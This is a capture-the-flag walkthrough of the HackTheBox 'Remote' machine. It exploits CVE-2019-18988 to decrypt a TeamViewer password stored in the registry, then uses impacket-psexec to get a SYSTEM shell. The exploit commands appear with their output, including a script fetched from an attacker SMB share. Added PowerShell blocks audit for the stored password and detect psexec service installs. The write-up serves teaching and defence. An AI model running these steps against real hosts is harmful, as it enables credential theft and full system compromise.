CVE-2019-18988
A vulnerability classified as critical was found in TeamViewer Desktop 14.7.1965. Affected by this vulnerability is an unknown function of the AES Key Handler component. Manipulation of the Configuration File leads to a weak-authentication vulnerability.
The vulnerability was published on 2020-02-07 and is identified as CVE-2019-18988. The vulnerability is relatively well known, although it is very complex. The attack can be launched remotely. Successful exploitation requires a single authentication session. Neither technical details nor an exploit are publicly available.
There is no information about possible known countermeasures. It is suggested to replace the affected product with an alternative product.
Exploit
While there are so many tools available for the exploit, I will just use this PowerShell script found online.
Exploitation
ps c:\tmp> copy \\10.10.14.5\smb\teamviewer\CVE-2019-18988.ps1 .
ps c:\tmp> . .\CVE-2019-18988.ps1
I transferred the PowerShell script and imported it into the current session for use.
ps c:\tmp> Get-TeamViewPasswords
#################L .###############u
##################N.@################ *
##################################### '>.n=L
###############################RR#### 'b" 9
###########################R#" .#### @ .*
########################^ .e#######P e"
#####################R# o########P @
###################P" .e> 4#" '####F .F
#################R .###& '# #### .#>
#################b.o##### #N "##" ."'>
######################### ##N "^ .# '>
############## "########R ###& ## '>
############## E"##P^9#E #### 8## '>
############## E " 9#F ####k .### '>
############## E 9#N ########## '>
############## E 9##.u########## '>
############## o" 9############## d
**************# ***************
ManniTV
[+] hklm:\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version7
[-] version : 7.0.43148
[+] securitypasswordaes : 255 155 28 115 214 107 206 49 172 65 62 174 19 27 70 79 88 47 108 226 209 225 243 218 126 141 55 107 38 57 78 91
[+] decrypt password ...
[+] decrypted password: !R3m0te!
Running the exploit cmdlet extracts and decrypts the stored password. It was located in the registry at hklm:\\SOFTWARE\\WOW6432Node\\TeamViewer\\Version7\\SecurityPasswordAES.
The decrypted password is !R3m0te!
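For the defending side, the useful check is whether a host is still carrying a stored TeamViewer password in the registry location this CVE concerns. The PowerShell audit function below is an added example, not part of the original writeup or of the exploit script; it only reports whether a SecurityPasswordAES value is present and which version is recorded, and decrypts nothing. The second registry root and the name of the Version value are assumptions (the writeup shows only the WOW6432Node\TeamViewer\Version7 key and a version of 7.0.43148).

```powershell
# Added audit helper (not part of the original writeup or the exploit script).
# For each TeamViewer registry key it finds, it reports the recorded version
# and whether a SecurityPasswordAES value is present, i.e. whether a stored
# unattended-access password sits where CVE-2019-18988 applies. Nothing is
# decrypted. The list of roots and the 'Version' value name are assumptions;
# the writeup only shows HKLM:\SOFTWARE\WOW6432Node\TeamViewer\Version7.
function Get-TeamViewerStoredPasswordExposure {
    [CmdletBinding()]
    param()

    $roots = @(
        'HKLM:\SOFTWARE\WOW6432Node\TeamViewer',   # shown in the writeup
        'HKLM:\SOFTWARE\TeamViewer'                # assumed 64-bit location
    )

    foreach ($root in $roots) {
        if (-not (Test-Path $root)) { continue }

        # The root key itself plus any VersionN subkeys (Version7 in the writeup)
        $keys = @(Get-Item $root) + @(Get-ChildItem $root -ErrorAction SilentlyContinue)

        foreach ($key in $keys) {
            $props = Get-ItemProperty -Path $key.PSPath -ErrorAction SilentlyContinue
            $hasStoredPassword = $null -ne $props.SecurityPasswordAES

            [PSCustomObject]@{
                Key                = $key.Name
                Version            = $props.Version          # assumed value name
                StoredPasswordAES  = $hasStoredPassword
                Finding            = if ($hasStoredPassword) {
                    'SecurityPasswordAES present: stored password exposed per CVE-2019-18988'
                } else {
                    'No stored password value under this key'
                }
            }
        }
    }
}

# Usage: run elevated on the host under review
Get-TeamViewerStoredPasswordExposure | Format-Table -AutoSize
```

Any key reported with StoredPasswordAES set to True is one where the unattended-access password should be removed or rotated and the client updated; the function is read-only, so it is safe to run from a scheduled compliance job.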
┌──(kali㉿kali)-[~/archive/htb/labs/remote]
└─$ impacket-psexec 'administrator:!R3m0te!@$IP' -target-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.10.10.180.....
[*] Found writable share ADMIN$
[*] Uploading file tcjbQmcA.exe
[*] Opening SVCManager on 10.10.10.180.....
[*] Creating service XgJM on 10.10.10.180.....
[*] Starting service XgJM.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\Windows\system32> whoami
nt authority\system
c:\Windows\system32> hostname
remote
c:\Windows\system32> ipconfig
Windows IP Configuration
ethernet adapter ethernet0 2:
connection-specific dns suffix . : htb
ipv6 address. . . . . . . . . . . : dead:beef::ba
ipv6 address. . . . . . . . . . . : dead:beef::25dd:3404:8d18:2459
link-local ipv6 address . . . . . : fe80::25dd:3404:8d18:2459%12
ipv4 address. . . . . . . . . . . : 10.10.10.180
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%12
10.10.10.2
System Level Compromise
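The psexec session above leaves a characteristic trace in the System event log: a "service installed" event (ID 7045) for a short random service name (XgJM) whose binary is a random eight-character .exe uploaded through ADMIN$ (tcjbQmcA.exe). The PowerShell detection below is an added example, not part of the original writeup; the sample events are constructed for the example, and the assumption that the uploaded binary shows up as %SystemRoot%\<name>.exe (ADMIN$ maps to the Windows directory) is mine, since the writeup does not print the image path.

```powershell
# Added detection example, not part of the original writeup. It scores
# service-install events for the pattern Impacket's psexec leaves behind:
# a four-letter service name plus an eight-letter .exe directly under
# %SystemRoot% (the ADMIN$ share). Both heuristics must hit for a flag,
# so a legitimately short service name alone does not alert.
function Test-ImpacketPsexecService {
    param(
        [Parameter(Mandatory, ValueFromPipeline)] [pscustomobject]$Event
    )
    process {
        $name = $Event.ServiceName
        $path = $Event.ImagePath
        $reasons = @()

        if ($name -match '^[A-Za-z]{4}$') {
            $reasons += 'four-letter random-looking service name'
        }
        # Assumption: ADMIN$ upload lands as %SystemRoot%\<8 letters>.exe
        if ($path -match '(?i)^%SystemRoot%\\[A-Za-z]{8}\.exe$') {
            $reasons += 'eight-letter .exe directly under %SystemRoot%'
        }

        [PSCustomObject]@{
            TimeCreated = $Event.TimeCreated
            ServiceName = $name
            ImagePath   = $path
            Suspicious  = ($reasons.Count -ge 2)
            Reasons     = ($reasons -join '; ')
        }
    }
}

# Constructed sample events (field names are mine, not the raw 7045 schema).
$sampleEvents = @(
    [PSCustomObject]@{ TimeCreated = '2022-01-01 10:00:00'; ServiceName = 'XgJM';    ImagePath = '%SystemRoot%\tcjbQmcA.exe' },
    [PSCustomObject]@{ TimeCreated = '2022-01-01 10:05:00'; ServiceName = 'Spooler'; ImagePath = '%SystemRoot%\System32\spoolsv.exe' },
    [PSCustomObject]@{ TimeCreated = '2022-01-01 10:07:00'; ServiceName = 'Wecs';    ImagePath = 'C:\Program Files\Vendor\wecs.exe' }
)

$sampleEvents | Test-ImpacketPsexecService | Format-Table -AutoSize
```

To run it against a live host, feed it objects built from `Get-WinEvent -FilterHashtable @{LogName='System'; Id=7045}`, mapping the event's first two property values to ServiceName and ImagePath (that property order is my understanding of the 7045 layout, so verify it against one real event before relying on it). Only the first sample row is flagged; the other two each trip at most one heuristic.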